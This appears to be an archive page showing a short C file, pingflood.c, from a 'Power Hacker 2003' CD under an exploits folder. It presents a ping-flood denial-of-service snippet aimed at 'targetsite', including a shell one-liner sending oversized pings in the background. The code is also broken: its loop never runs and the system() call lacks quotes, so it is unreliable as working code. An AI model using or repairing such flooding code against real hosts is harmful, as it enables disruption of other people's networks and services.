home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Power Hacker 2003
/
Power_Hacker_2003.iso
/
Exploit and vulnerability
/
hoobie
/
pingflood.c
< prev
next >
Encoding:
Amiga
Atari
Commodore
DOS
FM Towns/JPY
Macintosh
Macintosh JP
NeXTSTEP
RISC OS/Acorn
Shift JIS
UTF-8
Wrap
C/C++ Source or Header
|
2001-11-06
|
148 b
|
14 lines
/* %ping -s 2000 targetsite &
OR */
void main(){
int count=1;
for(;count>10;count++){
system (ping -s 2000 targetsite);
sleep(3);
}
}